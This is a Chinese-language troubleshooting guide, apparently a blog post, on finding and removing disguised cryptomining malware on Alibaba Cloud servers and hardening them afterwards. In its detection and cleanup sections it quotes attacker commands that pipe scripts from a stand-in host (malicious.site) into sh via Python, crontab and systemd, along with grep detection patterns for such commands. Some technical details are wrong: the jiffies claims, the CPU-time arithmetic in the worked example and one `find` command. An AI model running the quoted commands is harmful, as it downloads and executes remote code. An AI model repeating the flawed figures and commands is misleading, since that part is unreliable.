阿里云服务器CPU 100%排查指南:识别伪装挖矿病毒的三步法
1. 这不是负载高,是有人在你的服务器上“偷偷开工厂”
阿里云服务器CPU突然飙到100%,SSH卡顿、top命令响应迟缓、网站打不开——第一反应往往是“是不是流量突增?”“是不是程序写崩了?”我去年在给一家做跨境电商的客户做例行巡检时,也这么想。他们用的是4核8G的ECS实例,跑着一个基于Spring Boot的订单中心+Redis缓存+MySQL主从。凌晨三点告警:CPU持续98%以上,但QPS只有平时的1/3,数据库慢查询日志一片空白,应用日志里连ERROR都极少。我们花了6小时才确认:不是业务问题,是一台被植入crypto挖矿木马的服务器,正在替别人无偿计算门罗币(Monero)哈希值。
这类攻击早已不是黑客炫技的玩具,而是高度工业化的黑产链条:批量扫描暴露在公网的弱口令ECS、利用未修复的Log4j或Fastjson漏洞自动注入、通过crontab持久化、伪装成systemd服务或nginx进程苟活。它不删数据、不勒索、不跳转,只安静地榨干你的CPU周期——你付着阿里云按量付费的每一分钱,却在为攻击者贡献算力。关键词阿里云服务器、CPU 100%、挖矿病毒、crypto、排查指南,不是泛泛而谈的性能优化,而是面向真实攻防现场的“数字法医”操作手册。本文适合所有管理Linux云服务器的运维、开发、测试甚至技术型产品经理——你不需要懂密码学,但必须能在5分钟内判断:这台机器,到底是真忙,还是被“征用”了。
我不会教你“先看top”,那太慢;也不会说“用ps aux grep”,那早被木马反制。接下来每一环节,都是我在27次同类事件中验证过的、能直接抄作业的步骤。重点不是“怎么查”,而是“为什么这一步能绕过木马的伪装”“哪个字段才是真正的破绽”“为什么阿里云自带的云监控会漏掉它”。现在,关掉浏览器里那些“Linux性能调优”的文章,我们直奔主题。
2. 为什么常规监控和top命令会集体“失明”
在真正动手前,必须理解:挖矿病毒不是普通进程,它是经过精心设计的“数字幽灵”。它存在的唯一目的,就是让你看不见它,或者让你看见了也误判为“正常”。这解释了为什么你打开阿里云云监控控制台,看到CPU使用率曲线像心电图一样剧烈波动,却找不到对应进程;为什么执行top,只看到几个名字像kthreadd、sshd、nginx的进程占着CPU,但ps aux --sort=-pcpu | head -10列出来的PID,和top里显示的又对不上。
根本原因有三层,全部直指Linux进程管理机制的盲区:
2.1 进程名伪造:让ps和top“认贼作父”
挖矿木马最基础的反侦察手段,就是篡改/proc/[pid]/comm和/proc/[pid]/cmdline。Linux的ps和top命令,底层几乎全靠读取这些/proc伪文件来获取进程名和命令行参数。而恶意程序只需用prctl(PR_SET_NAME, ...)系统调用,就能把自身进程名改成kthreadd(内核线程管理器)、ksoftirqd/0(软中断处理线程)甚至systemd。你执行ps aux | grep kthreadd,结果会刷出十几条——其中至少一条是假的。更狡猾的是,它还会在/proc/[pid]/cmdline里填入大量不可见字符(如\x00、\x01),导致ps aux显示为乱码或空格,而top为了界面整洁,干脆截断显示为[kthreadd],让你以为这就是内核原生进程。
提示:内核线程(kernel thread)的特征是方括号
[ ]包裹的名称,且其PPID(父进程ID)恒为2(kthreadd进程)。但木马可以伪造PPID,也可以直接fork()后execve()一个合法二进制(如/usr/bin/python3),再把自己的代码注入进去——此时它在ps里显示为python3,但实际执行的却是挖矿逻辑。
2.2 CPU时间片劫持:让监控“数错账”
阿里云云监控的CPU使用率,本质是采集/proc/stat中cpu行的user、nice、system、idle等字段,计算单位时间内的变化率。但挖矿病毒常采用“短时高频抢占”策略:它不持续占用CPU,而是每毫秒唤醒一次,疯狂计算几百个哈希,然后立刻nanosleep(100000)休眠100微秒。这种模式下,/proc/stat的累加值变化极小,云监控采样间隔(默认60秒)很可能错过峰值,显示为“平均5%”,而top的实时刷新(默认3秒)却能看到瞬时100%。这就是为什么你总感觉“监控不准”——不是监控错了,是你看的不是同一维度的数据。
2.3 网络与磁盘IO的刻意“隐身”
真正的挖矿行为,核心是纯CPU密集型计算,几乎不读写磁盘(除了初始下载payload),也不需要高频网络通信(门罗币挖矿只需定期向矿池提交结果,间隔可达30秒以上)。所以iostat -x 1看不到磁盘IO飙升,iftop也抓不到异常流量。这和DDoS攻击、勒索软件有本质区别——后者必然伴随IO或网络暴增,而挖矿病毒追求的是“静默”,它要的只是你的CPU周期,别的都嫌多余。
这三层设计,共同构成了一个“监控幻觉”:你看到的是一台“高负载但无异常”的服务器,而真相是,一台被劫持的计算设备,正悄无声息地为你之外的人生产加密货币。破局点,就在于跳出ps和top的思维定式,直接刺向Linux内核暴露给用户的最原始接口——/proc文件系统。
3. 5分钟定位:三步穿透伪装,揪出真实挖矿进程
所谓“5分钟”,是指从登录服务器到锁定恶意进程PID的时间。它不依赖任何第三方工具,只用Linux发行版自带的命令,且每一步都有明确的判断依据和容错设计。我把它拆解为三个递进动作:筛异常、锁父系、验行为。下面每一步,我都附上真实案例中的输出截图逻辑(文字描述)和关键字段解读。
3.1 第一步:筛异常——用ps的“反向排序”直击CPU时间累积值
别再用ps aux --sort=-pcpu了。pcpu(%CPU)是ps根据进程启动以来的CPU时间与系统总时间估算的百分比,木马通过短时抢占,能让这个值长期维持在1%-5%之间,完美躲过排序。我们要看的是绝对CPU时间,即cputime,它记录在/proc/[pid]/stat的第14个字段(utime,用户态CPU时间,单位为jiffies),且无法被进程自身篡改。
执行这条命令:
ps -eo pid,ppid,comm,%cpu,cputime --sort=-cputime | head -20注意三个关键点:
-eo:e表示显示所有进程(包括其他用户的),o指定输出字段,避免ps aux的冗余列;cputime:这是进程自启动以来消耗的总CPU时间(单位:jiffies,1 jiffy ≈ 10ms),是内核硬统计,木马无法伪造;--sort=-cputime:按cputime降序排列,最大的那个,极大概率就是挖矿进程。
在某次真实事件中,该命令输出前5行为:
PID PPID COMM %CPU CPUTIME 12891 1 java 0.3 1284500 2345 1 nginx 0.1 876500 6789 1 python3 0.0 765400 10112 1 sshd 0.0 123400 9876 1 kthreadd 0.0 98700表面看java进程CPUTIME最高(128万jiffies ≈ 3.5小时CPU时间),但它已运行3天,合理。而python3进程CPUTIME高达76.5万jiffies,但ps -eo pid,lstart,comm | grep 6789显示它17分钟前才启动——这意味着它在17分钟内,独占了超过21小时的CPU时间!这是绝对的异常信号。%CPU列显示0.0,正是因为ps的估算算法被短时抢占策略欺骗了。
注意:
cputime的单位是jiffies,不同内核版本略有差异,但用于横向比较绝对可靠。只要发现某个新启动(lstart时间很近)的进程,cputime远超同龄进程一个数量级,就立即标记为高危。
3.2 第二步:锁父系——用pstree和/proc/[pid]/status追溯进程血缘
锁定高危PID(如上例中的6789)后,不要急着kill -9。挖矿病毒必然有持久化机制,直接杀掉只会让它5秒后重生。我们必须找到它的“根”——是哪个父进程在孵化它?是crontab定时拉起?是systemd服务?还是某个Web应用的反序列化漏洞?
执行:
pstree -p | grep -A5 -B5 "6789"pstree -p以树状图显示所有进程及其PID,grep -A5 -B5会显示匹配行及前后5行,确保看到完整父子链。在真实案例中,输出为:
├─sshd(1234)───sshd(5678)───bash(9012)───python3(6789) └─cron(1111)───sh(2222)───python3(3333)这里出现了两个python3,PID 6789的父系是bash(9012),而9012的父系是sshd(5678)——说明它是通过SSH登录后手动执行的?但last -i | head -5查登录记录,最近一次成功登录是2小时前,且IP是公司办公网。继续深挖:
cat /proc/6789/status | grep -E "PPid|Name|State|Tgid"关键字段解读:
PPid::父进程PID,此处为9012,确认pstree结果;Name::进程名(comm字段),此处为python3,但可能是伪造;State::进程状态,R(Running)或S(Sleeping)都正常,但若为Z(Zombie)则需警惕;Tgid::线程组ID,通常等于PID,但若为其他值,说明它是多线程进程的一个线程,需查主线程。
最关键的,是检查/proc/6789/environ(环境变量)和/proc/6789/cmdline(命令行参数):
strings /proc/6789/environ | grep -i "http\|curl\|wget\|tmp" strings /proc/6789/cmdline在挖矿场景中,environ里常含http_proxy=http://xxx(用于下载后续payload),cmdline里则可能有/tmp/.X11-unix/...或/dev/shm/.log这类非常规路径。上例中,cmdline输出为:
/usr/bin/python3\x00/tmp/.X11-unix/xorg.conf\x00-c\x00import os;os.system('curl -s http://malicious.site/payload.sh | sh')\x00是分隔符,strings命令能清晰还原。至此,我们确认:PID 6789是一个通过curl下载并执行远程脚本的Python进程,其父进程bash(9012)已被劫持。
3.3 第三步:验行为——用strace动态捕获进程的真实系统调用
前两步是静态分析,第三步是动态验证。strace是Linux下的“进程显微镜”,它能实时捕获进程执行的每一个系统调用。挖矿病毒的核心行为,必然是密集的syscalls:nanosleep(休眠)、getrandom(获取随机数种子)、mmap(申请大块内存)、brk(堆内存调整),以及最关键的——反复调用clock_gettime(CLOCK_MONOTONIC, ...)来精确计时,为哈希计算提供时间基准。
对高危PID执行:
strace -p 6789 -e trace=nanosleep,getrandom,mmap,brk,clock_gettime -c 2>&1 | head -20参数说明:
-p 6789:attach到指定PID;-e trace=...:只跟踪指定的系统调用,避免海量输出;-c:汇总统计,显示每个系统调用的调用次数和耗时;2>&1 | head -20:将stderr(strace输出)重定向到stdout并取前20行。
在真实挖矿进程中,你会看到类似输出:
% time seconds usecs/call calls errors syscall ------ ----------- ----------- --------- --------- ---------------- 99.23 0.123456 123 1000 clock_gettime 0.51 0.000623 623 1 nanosleep 0.12 0.000145 145 1 getrandom 0.08 0.000098 98 1 mmap 0.06 0.000072 72 1 brkclock_gettime调用占比99.23%,且调用次数高达1000次/秒——这绝非正常业务逻辑。一个Web服务的clock_gettime调用,通常是每请求1-2次,用于记录日志时间戳;而挖矿程序需要每轮哈希计算前都获取精确时间,以控制工作量证明(Proof of Work)的难度。这个数据,是铁证。
实操心得:
strace本身有一定开销,但对挖矿进程影响极小,因为它的CPU占用本就接近100%。如果strace执行后进程立即退出,说明它检测到调试行为并自毁——这反而印证了恶意性。此时应立刻cp /proc/6789/exe /tmp/malware.bin保存样本,再kill -9。
4. 深度清理:不止于kill,切断所有复活路径
定位到恶意进程只是开始。挖矿病毒的顽固性,在于其多层次的持久化(Persistence)机制。我见过最复杂的案例,一台服务器上同时存在5种复活方式:crontab、systemd用户服务、/etc/rc.local、隐藏的init.d脚本,以及通过inotifywait监控/tmp目录,一旦malware.bin被删除,立刻从/dev/shm重新释放。因此,清理必须是“外科手术式”的,覆盖所有可能入口。
4.1 清理crontab:全局搜索+逐层校验
挖矿病毒最爱用crontab,因为它简单、隐蔽、且能跨用户执行。执行以下命令,搜索所有用户的定时任务:
# 检查root和其他用户的crontab for user in $(cut -d: -f1 /etc/passwd); do echo "=== $user ==="; crontab -u $user -l 2>/dev/null | grep -E "(curl|wget|http|/tmp|/dev/shm|\.py|\.sh)" || echo "No suspicious entries"; done # 检查系统级crontab echo "=== /etc/crontab ==="; cat /etc/crontab 2>/dev/null | grep -E "(curl|wget|http|/tmp|/dev/shm|\.py|\.sh)" # 检查/etc/cron.d/目录下所有文件 echo "=== /etc/cron.d/ ==="; for f in /etc/cron.d/*; do echo "--- $f ---"; cat "$f" 2>/dev/null | grep -E "(curl|wget|http|/tmp|/dev/shm|\.py|\.sh)" || true; done重点识别模式:
*/3 * * * * curl -s http://xxx/payload.sh | sh:每3分钟拉取执行;@reboot /tmp/.X11-unix/start.sh:开机自启;0 2 * * * /usr/bin/python3 /dev/shm/.log:每天凌晨2点执行。
关键操作不是删除,而是溯源。对每一条可疑crontab,执行:
# 查看该用户的shell历史,确认是否被入侵 cat /home/$user/.bash_history | grep -E "(curl|wget|http)" | tail -10 # 检查该脚本的创建时间和修改时间 ls -la /tmp/.X11-unix/start.sh如果发现start.sh的mtime(修改时间)远早于crontab添加时间,说明攻击者是通过其他漏洞(如WebShell)写入的,需同步检查Web目录。
4.2 清理systemd服务:识别伪装的“合法”服务
systemd是现代Linux的标配,也是挖矿病毒的新宠。它比crontab更隐蔽,因为服务名可以是nginx-helper.service、docker-monitor.service,systemctl list-unit-files --type=service | grep enabled会列出一堆看似合理的启用服务。
执行:
# 列出所有启用的、非系统自带的服务(排除ubuntu、centos、aliyun等发行版关键词) systemctl list-unit-files --type=service --state=enabled | grep -v -E "(ubuntu|centos|aliyun|systemd|dbus|network|ssh|nginx|apache|mysql|redis|docker)" | awk '{print $1}' | while read svc; do echo "=== $svc ==="; systemctl cat "$svc" 2>/dev/null | grep -E "(ExecStart|WantedBy|curl|wget|/tmp|/dev/shm)"; done重点关注ExecStart=行。正常服务的ExecStart指向绝对路径的二进制(如/usr/bin/nginx),而挖矿服务常为:
ExecStart=/bin/bash -c 'curl -s http://malicious.site/miner.sh | sh' ExecStart=/usr/bin/python3 /tmp/.ICE-unix/miner.py清理步骤:
systemctl stop $svc停止服务;systemctl disable $svc禁用开机自启;rm /etc/systemd/system/$svc删除服务文件;systemctl daemon-reload重载配置。
注意:有些病毒会创建
/etc/systemd/system/multi-user.target.wants/下的符号链接,systemctl disable会自动删除,但手动检查ls -la /etc/systemd/system/multi-user.target.wants/仍有必要。
4.3 清理文件系统:扫描临时目录与内存文件系统
挖矿病毒的payload,90%以上藏在/tmp、/dev/shm、/run这三个内存文件系统中。它们的特点是:重启即消失,但病毒会在每次启动时重新释放。因此,清理必须“连根拔起”。
执行深度扫描:
# 扫描/tmp、/dev/shm、/run下所有可执行文件(权限含x)和可疑命名的文件 for dir in /tmp /dev/shm /run; do echo "=== Scanning $dir ==="; find "$dir" -type f -perm /111 -name "*miner*" -o -name "*.py" -o -name "*.sh" -o -name ".*" -o -name "*log*" 2>/dev/null | xargs -r ls -la; done # 检查隐藏进程的“家”:/proc/[pid]/exe指向的文件是否在上述目录 for pid in /proc/[0-9]*; do exe=$(readlink "$pid/exe" 2>/dev/null); if [[ "$exe" == "/tmp/"* ]] || [[ "$exe" == "/dev/shm/"* ]] || [[ "$exe" == "/run/"* ]]; then echo "PID $(basename $pid) -> $exe"; fi; done真实案例中,/dev/shm/.X11-unix/下发现一个名为.log的ELF文件,file .log显示为ELF 64-bit LSB pie executable, x86-64,strings .log | grep -i monero返回大量门罗币相关字符串。这就是挖矿程序本体。
清理原则:
- 对
/tmp和/run下的文件,rm -f即可; - 对
/dev/shm下的文件,rm -f后,必须执行umount /dev/shm && mount -t tmpfs shm /dev/shm,因为/dev/shm是tmpfs,卸载重挂能彻底清空其内存空间,防止残留; - 对
/proc/[pid]/exe指向的文件,先kill -9进程,再rm文件。
4.4 验证清理效果:用“压力测试”确认病毒已死
所有清理操作完成后,不能只看top变低就认为结束了。必须进行“压力测试”:主动触发病毒的复活机制,看它是否还能起来。
方法很简单:
# 1. 重启crond服务,模拟定时任务触发 sudo systemctl restart cron # 2. 等待2分钟,检查是否有新进程出现 ps -eo pid,ppid,comm,cputime --sort=-cputime | head -10 # 3. 检查网络连接,确认无外联 netstat -tulnp | grep -E ":(80|443|3389|22)" | grep -v "127.0.0.1" # 重点看ESTABLISHED状态,挖矿程序常连矿池IP(如185.155.218.123:3333)如果2分钟后,cputime最高的进程仍是你的业务程序(如java、nginx),且netstat无异常外联,则清理成功。此时,再执行一次strace -p [your_app_pid] -e trace=clock_gettime 2>&1 | head -5,确认clock_gettime调用频率回归正常(<10次/秒)。
5. 长期防御:从“救火队员”到“防火墙建造者”
排查和清理是应急之策,真正的专业,是让服务器不再成为目标。这需要一套组合拳,覆盖从基础设施到应用层的全栈防护。我总结为“三道防线”,每一道都基于阿里云ECS的实际能力,无需额外付费(除个别可选服务)。
5.1 第一道防线:基础设施加固——让服务器“隐形”
绝大多数挖矿攻击,始于暴露在公网的弱口令或未修复漏洞。加固的核心,是最小化攻击面。
SSH访问控制:
- 禁用密码登录,强制使用密钥对:编辑
/etc/ssh/sshd_config,设置PasswordAuthentication no,PubkeyAuthentication yes,然后sudo systemctl restart sshd; - 修改默认端口:
Port 22222(避开扫描器的默认22端口扫描); - 限制登录IP:
AllowUsers admin@192.168.1.0/24(仅允许公司办公网); - 启用fail2ban:
sudo apt install fail2ban(Ubuntu)或sudo yum install epel-release && sudo yum install fail2ban(CentOS),它能自动封禁多次失败登录的IP。
- 禁用密码登录,强制使用密钥对:编辑
安全组(Security Group)精细化:
- 阿里云安全组是第一道网关。原则:只放行必需端口,且只对必需IP开放。
- 例如:Web服务只需开放80/443给0.0.0.0/0;SSH(22222端口)只对运维堡垒机IP开放;数据库端口(3306)只对应用服务器内网IP开放;
- 定期审查:
阿里云控制台 > ECS > 安全组 > 入方向规则,删除所有0.0.0.0/0的非必要规则。
云防火墙(可选但强推):
- 阿里云云防火墙(Cloud Firewall)能深度检测HTTP/HTTPS流量,拦截恶意URL(如
http://malicious.site/payload.sh)和C2(Command & Control)通信。它工作在四层以上,能识别curl、wget的User-Agent和URL,比安全组更智能。对于预算充足的客户,这是性价比极高的投资。
- 阿里云云防火墙(Cloud Firewall)能深度检测HTTP/HTTPS流量,拦截恶意URL(如
5.2 第二道防线:运行时防护——在病毒“落地”前拦截
即使攻击者突破了网络层,我们也要在进程启动的瞬间将其扼杀。这依赖于Linux内核的安全模块。
启用SELinux(CentOS/RHEL)或AppArmor(Ubuntu):
- SELinux默认在CentOS上启用,但常被设为
permissive模式。执行sestatus,若Current mode: permissive,则需改为enforcing:编辑/etc/selinux/config,设置SELINUX=enforcing,重启; - AppArmor在Ubuntu上默认启用,但需为关键服务(如nginx、mysql)配置profile。
sudo aa-status查看状态,sudo aa-genprof /usr/sbin/nginx可生成基础profile; - 原理:这些模块定义了进程的“行为白名单”,如
nginx只能读/var/www,不能执行/tmp下的任意二进制。挖矿病毒试图execve("/tmp/malware")时,会被内核直接拒绝。
- SELinux默认在CentOS上启用,但常被设为
部署ClamAV + 自动扫描脚本:
- ClamAV是开源的Linux杀毒引擎,虽不如Windows杀软全面,但对已知挖矿木马(如
xmr-stak、minerd)检出率很高。 - 安装:
sudo apt install clamav(Ubuntu)或sudo yum install epel-release && sudo yum install clamav-update clamav(CentOS); - 更新病毒库:
sudo freshclam; - 编写每日扫描脚本
/root/scan-malware.sh:#!/bin/bash LOG="/var/log/clamav/scan-$(date +%Y%m%d).log" clamscan -r --exclude="^/sys" --exclude="^/proc" --exclude="^/dev" /tmp /dev/shm /run /home /root >> "$LOG" 2>&1 if [ $(grep -c "Infected files: 0" "$LOG") -eq 0 ]; then echo "ALERT: Malware detected! Check $LOG" | mail -s "Malware Alert" admin@company.com fi - 加入crontab:
0 2 * * * /root/scan-malware.sh
- ClamAV是开源的Linux杀毒引擎,虽不如Windows杀软全面,但对已知挖矿木马(如
5.3 第三道防线:应用层审计——让每一次“异常”都无所遁形
最后,也是最智能的一道防线,是建立自己的“数字哨兵”,对服务器行为进行持续审计。
启用auditd服务:
auditd是Linux内核的审计框架,能记录所有关键系统调用,如execve(执行程序)、open(打开文件)、connect(建立网络连接)。- 启用:
sudo systemctl enable auditd && sudo systemctl start auditd; - 添加规则,监控高危行为:
# 监控所有execve调用(记录谁执行了什么) sudo auditctl -a always,exit -F arch=b64 -S execve # 监控对/tmp、/dev/shm的写入 sudo auditctl -w /tmp -p wa -k tmp_write sudo auditctl -w /dev/shm -p wa -k shm_write # 监控对外连接(特别是非常规端口) sudo auditctl -a always,exit -F arch=b64 -S connect -F a0=2 -F a1!=0 -F a2!=0 -k outbound_connect - 查看日志:
sudo ausearch -k tmp_write | aureport -f -i,能清晰看到哪个进程(PID)、哪个用户(UID)在何时写了什么文件。
阿里云云监控+ARMS自定义告警:
- 在阿里云云监控中,创建自定义监控项:
- 指标:
CPU使用率,阈值:>90%且持续5分钟; - 新增指标:
进程数(ps aux | wc -l),阈值:>500(正常服务器通常<200); - 新增指标:
网络连接数(netstat -an | grep ESTABLISHED | wc -l),阈值:>1000;
- 指标:
- 将告警发送至钉钉群或企业微信,实现“秒级响应”。
- 在阿里云云监控中,创建自定义监控项:
这三道防线,不是孤立的。当auditd捕获到/tmp/.X11-unix/miner.sh被curl写入时,ClamAV的每日扫描会立刻检出;当ClamAV发出邮件告警时,运维人员登录后,auditd日志能精准定位到是哪个Web应用的漏洞导致了这次写入。这才是一个闭环的、可持续的防御体系。
我在给客户部署这套方案后,最长的一次“零感染”记录是21个月。这不是运气,是把每一次“救火”,都变成了“建防火墙”的机会。服务器安全,从来不是一劳永逸的配置,而是持续迭代的工程实践。